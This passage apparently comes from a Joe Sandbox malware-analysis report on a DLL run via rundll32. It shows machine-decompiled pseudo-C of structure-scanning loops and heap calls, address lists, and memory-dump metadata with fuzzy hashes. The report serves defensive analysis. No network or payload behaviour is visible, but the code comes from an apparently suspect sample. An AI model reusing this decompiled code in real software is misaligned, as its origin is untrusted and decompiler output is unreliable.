                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                				_v5 = 0;
                                                                                                                                                                                                                				_t208 = E1000BF58( &_v5);
                                                                                                                                                                                                                				_v16 = _t208;
                                                                                                                                                                                                                				if(_t208 != 0) {
                                                                                                                                                                                                                					_t222 = _v5 - 5;
                                                                                                                                                                                                                					if(_v5 == 5) {
                                                                                                                                                                                                                						_t8 = _t216 + 0xc; // 0xc
                                                                                                                                                                                                                						_t9 = _t216 + 8; // 0x8
                                                                                                                                                                                                                						_t10 = _t216 + 4; // 0x4
                                                                                                                                                                                                                						E10003C58(_t208, _v12, __fp0, _t216, _t10, _t9, _t8);
                                                                                                                                                                                                                						_t217 = _t217 + 0x10;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				E1000953B( &_v16, _v12);
                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                				_t127 = E1000198C(0x187);
                                                                                                                                                                                                                				_push(0x187);
                                                                                                                                                                                                                				_v16 = _t127;
                                                                                                                                                                                                                				_t175 =  *0x10020d88; // 0x474fc98
                                                                                                                                                                                                                				_t16 = _t175 + 0x224; // 0x10000000
                                                                                                                                                                                                                				_t209 = E10010796( *_t16, _t127, _t222, _t260,  &_v12);
                                                                                                                                                                                                                				_v24 = _t209;
                                                                                                                                                                                                                				E1000A27E( &_v16);
                                                                                                                                                                                                                				if(_t209 != 0) {
                                                                                                                                                                                                                					_t151 = E1000198C(0x154);
                                                                                                                                                                                                                					_push(0x154);
                                                                                                                                                                                                                					_v16 = _t151;
                                                                                                                                                                                                                					_t214 = E10010133(_v12, _t151);
                                                                                                                                                                                                                					_t186 =  &_v16;
                                                                                                                                                                                                                					_v20 = _t214;
                                                                                                                                                                                                                					E1000A27E(_t186);
                                                                                                                                                                                                                					if(_t214 != 0) {
                                                                                                                                                                                                                						_push(_t186);
                                                                                                                                                                                                                						_t215 = E10010133( *((intOrPtr*)(_t214 + 0x428)), 0);
                                                                                                                                                                                                                						_v16 = _t215;
                                                                                                                                                                                                                						if(_t215 != 0) {
                                                                                                                                                                                                                							_t27 = _t216 + 0x1c; // 0x1c
                                                                                                                                                                                                                							_t28 = _t216 + 0x18; // 0x18
                                                                                                                                                                                                                							_t29 = _t216 + 0x14; // 0x14
                                                                                                                                                                                                                							_t31 = _t216 + 0x10; // 0x10
                                                                                                                                                                                                                							E10003C58( *((intOrPtr*)(_t215 + 0x424)),  *((intOrPtr*)(_t215 + 0x428)), _t260, _t31, _t29, _t28, _t27);
                                                                                                                                                                                                                							E100104E3( &_v16);
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						E100104E3( &_v20);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					E1000953B( &_v24, _v12);
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				if( *((intOrPtr*)(_t216 + 4)) <= 0) {
                                                                                                                                                                                                                					L29:
                                                                                                                                                                                                                					if( *((intOrPtr*)(_t216 + 0xc)) <= 0) {
                                                                                                                                                                                                                						L48:
                                                                                                                                                                                                                						return _t216;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t165 = 0;
                                                                                                                                                                                                                					_t202 = 0;
                                                                                                                                                                                                                					_v12 = 0;
                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                						if( *((intOrPtr*)(_t216 + 0x10)) == 0) {
                                                                                                                                                                                                                							L39:
                                                                                                                                                                                                                							if( *((intOrPtr*)(_t216 + 0x18)) == 0) {
                                                                                                                                                                                                                								goto L47;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t211 = 0;
                                                                                                                                                                                                                							if( *((intOrPtr*)(_t216 + 0x1c)) <= 0) {
                                                                                                                                                                                                                								goto L47;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t178 = 0;
                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                								_t166 =  *((intOrPtr*)(_t216 + 8));
                                                                                                                                                                                                                								if( *(_t178 +  *((intOrPtr*)(_t216 + 0x18)) + 4) ==  *((intOrPtr*)(_t202 + _t166 + 4)) &&  *((intOrPtr*)(_t178 +  *((intOrPtr*)(_t216 + 0x18)) + 8)) ==  *((intOrPtr*)(_t202 + _t166 + 8))) {
                                                                                                                                                                                                                									 *(_t178 +  *((intOrPtr*)(_t216 + 0x18)) + 4) =  *(_t178 +  *((intOrPtr*)(_t216 + 0x18)) + 4) & 0x00000000;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_t211 = _t211 + 1;
                                                                                                                                                                                                                								_t178 = _t178 + 0x24;
                                                                                                                                                                                                                							} while (_t211 <  *((intOrPtr*)(_t216 + 0x1c)));
                                                                                                                                                                                                                							_t165 = _v12;
                                                                                                                                                                                                                							goto L47;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t210 = 0;
                                                                                                                                                                                                                						if( *((intOrPtr*)(_t216 + 0x14)) <= 0) {
                                                                                                                                                                                                                							goto L39;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t179 = 0;
                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                							_t167 =  *((intOrPtr*)(_t216 + 8));
                                                                                                                                                                                                                							if( *(_t179 +  *((intOrPtr*)(_t216 + 0x10)) + 4) ==  *((intOrPtr*)(_t202 + _t167 + 4)) &&  *((intOrPtr*)(_t179 +  *((intOrPtr*)(_t216 + 0x10)) + 8)) ==  *((intOrPtr*)(_t202 + _t167 + 8))) {
                                                                                                                                                                                                                								 *(_t179 +  *((intOrPtr*)(_t216 + 0x10)) + 4) =  *(_t179 +  *((intOrPtr*)(_t216 + 0x10)) + 4) & 0x00000000;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t210 = _t210 + 1;
                                                                                                                                                                                                                							_t179 = _t179 + 0x24;
                                                                                                                                                                                                                						} while (_t210 <  *((intOrPtr*)(_t216 + 0x14)));
                                                                                                                                                                                                                						_t165 = _v12;
                                                                                                                                                                                                                						goto L39;
                                                                                                                                                                                                                						L47:
                                                                                                                                                                                                                						_t165 = _t165 + 1;
                                                                                                                                                                                                                						_t202 = _t202 + 0x24;
                                                                                                                                                                                                                						_v12 = _t165;
                                                                                                                                                                                                                					} while (_t165 <  *((intOrPtr*)(_t216 + 0xc)));
                                                                                                                                                                                                                					goto L48;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					_t168 = 0;
                                                                                                                                                                                                                					_t203 = 0;
                                                                                                                                                                                                                					_v12 = 0;
                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                						if( *((intOrPtr*)(_t216 + 0x10)) == 0) {
                                                                                                                                                                                                                							L20:
                                                                                                                                                                                                                							if( *((intOrPtr*)(_t216 + 0x18)) == 0) {
                                                                                                                                                                                                                								goto L28;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t213 = 0;
                                                                                                                                                                                                                							if( *((intOrPtr*)(_t216 + 0x1c)) <= 0) {
                                                                                                                                                                                                                								goto L28;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t180 = 0;
                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                								_t169 =  *_t216;
                                                                                                                                                                                                                								if( *(_t180 +  *((intOrPtr*)(_t216 + 0x18)) + 4) ==  *((intOrPtr*)(_t203 + _t169 + 4)) &&  *((intOrPtr*)(_t180 +  *((intOrPtr*)(_t216 + 0x18)) + 8)) ==  *((intOrPtr*)(_t203 + _t169 + 8))) {
                                                                                                                                                                                                                									 *(_t180 +  *((intOrPtr*)(_t216 + 0x18)) + 4) =  *(_t180 +  *((intOrPtr*)(_t216 + 0x18)) + 4) & 0x00000000;
                                                                                                                                                                                                                								}
                                                                                                                                                                                                                								_t213 = _t213 + 1;
                                                                                                                                                                                                                								_t180 = _t180 + 0x24;
                                                                                                                                                                                                                							} while (_t213 <  *((intOrPtr*)(_t216 + 0x1c)));
                                                                                                                                                                                                                							_t168 = _v12;
                                                                                                                                                                                                                							goto L28;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t212 = 0;
                                                                                                                                                                                                                						if( *((intOrPtr*)(_t216 + 0x14)) <= 0) {
                                                                                                                                                                                                                							goto L20;
                                                                                                                                                                                                                						}
                                                                                                                                                                                                                						_t181 = 0;
                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                							_t170 =  *_t216;
                                                                                                                                                                                                                							if( *(_t181 +  *((intOrPtr*)(_t216 + 0x10)) + 4) ==  *((intOrPtr*)(_t203 + _t170 + 4)) &&  *((intOrPtr*)(_t181 +  *((intOrPtr*)(_t216 + 0x10)) + 8)) ==  *((intOrPtr*)(_t203 + _t170 + 8))) {
                                                                                                                                                                                                                								 *(_t181 +  *((intOrPtr*)(_t216 + 0x10)) + 4) =  *(_t181 +  *((intOrPtr*)(_t216 + 0x10)) + 4) & 0x00000000;
                                                                                                                                                                                                                							}
                                                                                                                                                                                                                							_t212 = _t212 + 1;
                                                                                                                                                                                                                							_t181 = _t181 + 0x24;
                                                                                                                                                                                                                						} while (_t212 <  *((intOrPtr*)(_t216 + 0x14)));
                                                                                                                                                                                                                						_t168 = _v12;
                                                                                                                                                                                                                						goto L20;
                                                                                                                                                                                                                						L28:
                                                                                                                                                                                                                						_t168 = _t168 + 1;
                                                                                                                                                                                                                						_t203 = _t203 + 0x24;
                                                                                                                                                                                                                						_v12 = _t168;
                                                                                                                                                                                                                					} while (_t168 <  *((intOrPtr*)(_t216 + 4)));
                                                                                                                                                                                                                					goto L29;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                			}



































                                                                                                                                                                                                                0x10003eea
                                                                                                                                                                                                                0x10003ef5
                                                                                                                                                                                                                0x10003efa
                                                                                                                                                                                                                0x10003eff
                                                                                                                                                                                                                0x10004168
                                                                                                                                                                                                                0x10004168
                                                                                                                                                                                                                0x10003f0e
                                                                                                                                                                                                                0x10003f11
                                                                                                                                                                                                                0x10003f19
                                                                                                                                                                                                                0x10003f1b
                                                                                                                                                                                                                0x10003f21
                                                                                                                                                                                                                0x10003f23
                                                                                                                                                                                                                0x10003f27
                                                                                                                                                                                                                0x10003f2c
                                                                                                                                                                                                                0x10003f30
                                                                                                                                                                                                                0x10003f36
                                                                                                                                                                                                                0x10003f3b
                                                                                                                                                                                                                0x10003f40
                                                                                                                                                                                                                0x10003f40
                                                                                                                                                                                                                0x10003f27
                                                                                                                                                                                                                0x10003f4a
                                                                                                                                                                                                                0x10003f54
                                                                                                                                                                                                                0x10003f57
                                                                                                                                                                                                                0x10003f5c
                                                                                                                                                                                                                0x10003f60
                                                                                                                                                                                                                0x10003f64
                                                                                                                                                                                                                0x10003f6c
                                                                                                                                                                                                                0x10003f7d
                                                                                                                                                                                                                0x10003f7f
                                                                                                                                                                                                                0x10003f82
                                                                                                                                                                                                                0x10003f89
                                                                                                                                                                                                                0x10003f94
                                                                                                                                                                                                                0x10003f9c
                                                                                                                                                                                                                0x10003fa0
                                                                                                                                                                                                                0x10003faa
                                                                                                                                                                                                                0x10003fac
                                                                                                                                                                                                                0x10003faf
                                                                                                                                                                                                                0x10003fb2
                                                                                                                                                                                                                0x10003fb9
                                                                                                                                                                                                                0x10003fc1
                                                                                                                                                                                                                0x10003fce
                                                                                                                                                                                                                0x10003fd0
                                                                                                                                                                                                                0x10003fd7
                                                                                                                                                                                                                0x10003fdf
                                                                                                                                                                                                                0x10003fe3
                                                                                                                                                                                                                0x10003fe7
                                                                                                                                                                                                                0x10003ff1
                                                                                                                                                                                                                0x10003ff5
                                                                                                                                                                                                                0x10004000
                                                                                                                                                                                                                0x10004000
                                                                                                                                                                                                                0x10004008
                                                                                                                                                                                                                0x10004008
                                                                                                                                                                                                                0x10004014
                                                                                                                                                                                                                0x1000401a
                                                                                                                                                                                                                0x1000401e
                                                                                                                                                                                                                0x100040bd
                                                                                                                                                                                                                0x100040c1
                                                                                                                                                                                                                0x10004162
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10004162
                                                                                                                                                                                                                0x100040c7
                                                                                                                                                                                                                0x100040c9
                                                                                                                                                                                                                0x100040cb
                                                                                                                                                                                                                0x100040ce
                                                                                                                                                                                                                0x100040d2
                                                                                                                                                                                                                0x10004110
                                                                                                                                                                                                                0x10004114
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10004116
                                                                                                                                                                                                                0x1000411b
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000411d
                                                                                                                                                                                                                0x1000411f
                                                                                                                                                                                                                0x10004122
                                                                                                                                                                                                                0x1000412d
                                                                                                                                                                                                                0x10004141
                                                                                                                                                                                                                0x10004141
                                                                                                                                                                                                                0x10004146
                                                                                                                                                                                                                0x10004147
                                                                                                                                                                                                                0x1000414a
                                                                                                                                                                                                                0x1000414f
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000414f
                                                                                                                                                                                                                0x100040d4
                                                                                                                                                                                                                0x100040d9
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100040db
                                                                                                                                                                                                                0x100040dd
                                                                                                                                                                                                                0x100040e0
                                                                                                                                                                                                                0x100040eb
                                                                                                                                                                                                                0x100040ff
                                                                                                                                                                                                                0x100040ff
                                                                                                                                                                                                                0x10004104
                                                                                                                                                                                                                0x10004105
                                                                                                                                                                                                                0x10004108
                                                                                                                                                                                                                0x1000410d
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10004152
                                                                                                                                                                                                                0x10004152
                                                                                                                                                                                                                0x10004153
                                                                                                                                                                                                                0x10004156
                                                                                                                                                                                                                0x10004159
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10004024
                                                                                                                                                                                                                0x10004024
                                                                                                                                                                                                                0x10004026
                                                                                                                                                                                                                0x10004028
                                                                                                                                                                                                                0x1000402b
                                                                                                                                                                                                                0x1000402f
                                                                                                                                                                                                                0x1000406c
                                                                                                                                                                                                                0x10004070
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10004072
                                                                                                                                                                                                                0x10004077
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10004079
                                                                                                                                                                                                                0x1000407b
                                                                                                                                                                                                                0x1000407e
                                                                                                                                                                                                                0x10004088
                                                                                                                                                                                                                0x1000409c
                                                                                                                                                                                                                0x1000409c
                                                                                                                                                                                                                0x100040a1
                                                                                                                                                                                                                0x100040a2
                                                                                                                                                                                                                0x100040a5
                                                                                                                                                                                                                0x100040aa
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100040aa
                                                                                                                                                                                                                0x10004031
                                                                                                                                                                                                                0x10004036
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x10004038
                                                                                                                                                                                                                0x1000403a
                                                                                                                                                                                                                0x1000403d
                                                                                                                                                                                                                0x10004047
                                                                                                                                                                                                                0x1000405b
                                                                                                                                                                                                                0x1000405b
                                                                                                                                                                                                                0x10004060
                                                                                                                                                                                                                0x10004061
                                                                                                                                                                                                                0x10004064
                                                                                                                                                                                                                0x10004069
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x100040ad
                                                                                                                                                                                                                0x100040ad
                                                                                                                                                                                                                0x100040ae
                                                                                                                                                                                                                0x100040b1
                                                                                                                                                                                                                0x100040b4
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000402b

                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                • Opcode ID: d302b8bed4a6726586d7796b05faaa06bc7d6ca5ee3a3c6dfd505f8b3c281936
                                                                                                                                                                                                                • Instruction ID: cf6ca6b42b56d04065e953f17323c7ec346a95c519199b254ba4ccf5b6d1ff2d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d302b8bed4a6726586d7796b05faaa06bc7d6ca5ee3a3c6dfd505f8b3c281936
                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED91CFB5A007019BD721CF54C4C0AAAB3F1FF84388F12855DE59657A4ADB30F9C6CB64
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 03508ef7a461b0c526fa3b6c724e9bbf49bec6aab501889d486f94ce8d0fe274
                                                                                                                                                                                                                • Instruction ID: d44f7d24b1c51bb840209d1562cceece2dd248818f645804ceb860721f1f5ec4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 03508ef7a461b0c526fa3b6c724e9bbf49bec6aab501889d486f94ce8d0fe274
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C87185316205794FE704CF2ADCD143637A1F38E391386C519EA45CB395C638E566DBE0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: b179ebe0a10ae8f9bfd0736ee6230cb3998ab5049f657adb26191df387806924
                                                                                                                                                                                                                • Instruction ID: fad8c7b219dbfeeb7d3fd678287538bd172af9ecf68de129d89f71a81b13e65a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b179ebe0a10ae8f9bfd0736ee6230cb3998ab5049f657adb26191df387806924
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D65168B3B041B00BDF68CE3E8C642757ED25AC505270EC2B6E9A9CF24AE878C7059760
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: ddd1ae92bcf80342cdd4ce101a03d61d7b050554caf2ba98792aacaa291ae89a
                                                                                                                                                                                                                • Instruction ID: ccdbadd7ba936380601ea3cbd651e1978539a031b4c4eed27f92f684b5335f8e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ddd1ae92bcf80342cdd4ce101a03d61d7b050554caf2ba98792aacaa291ae89a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B51D3B4E01228DFEB52CF68C9C0B99BBF0BB0E314F11816AE958E3311D335A9858F51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000003.5699824558.00000000043B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_3_43b0000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 8e7cfee9437a444e8fc128acef361a85886a240b47ba43e2e0b88c7076991434
                                                                                                                                                                                                                • Instruction ID: 1924070537e52bf08c403364383078c0b00f00864b86860a13fb5b27a5318425
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e7cfee9437a444e8fc128acef361a85886a240b47ba43e2e0b88c7076991434
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F741F875E14208DFCB54CF98C488BEEB7F5AB08310F945295DA89ABB51E330A980DB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 915d649be514e69a95b989d83612c341975e5e95291d22175ae017ea06cd4cf2
                                                                                                                                                                                                                • Instruction ID: d0fa73270d71585e7083f40233a42da0893e9660e5d16aed493464a71ca59f01
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 915d649be514e69a95b989d83612c341975e5e95291d22175ae017ea06cd4cf2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B2171367154128BD35CCF2CD8A6A69F3A5FB49210F85427ED51BCB682CB72E492CBC0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727588899.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727558931.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727859066.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727885261.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728054369.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728081580.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728113563.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5728303912.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_69340000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: c0f6ec2e13ef26ba2937adaa2fbb4dad4a63932638b2fe3b5a50e18eaf2d7e57
                                                                                                                                                                                                                • Instruction ID: 858b549502c8a1020fa0d23666debce769d8150b6a17ffa186c74a4d37e00801
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0f6ec2e13ef26ba2937adaa2fbb4dad4a63932638b2fe3b5a50e18eaf2d7e57
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 72110939E41A08CFDB44CF98C190A98BBF5FB2CB14F924095E855AB762D332ED90CB55
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 5fa959bf55afc4f8d49bc31b5d3d751fe6b1c2fbb56e6436ccdfb01f05ea325b
                                                                                                                                                                                                                • Instruction ID: 8c55d59481a20edac22beb63bcdc80e93f7f59946f39b981f18aa1c6f739a984
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fa959bf55afc4f8d49bc31b5d3d751fe6b1c2fbb56e6436ccdfb01f05ea325b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63F04F316183826AF349CB788806F0A32C6EB402E0F348279E158CB1EAEEA0DA419304
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                                			E1000DFB4(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                				signed int _v32;
                                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                				signed int _v44;
                                                                                                                                                                                                                				char _v48;
                                                                                                                                                                                                                				char _v52;
                                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                                				signed int _v60;
                                                                                                                                                                                                                				char* _v72;
                                                                                                                                                                                                                				signed short _v80;
                                                                                                                                                                                                                				signed int _v84;
                                                                                                                                                                                                                				char _v88;
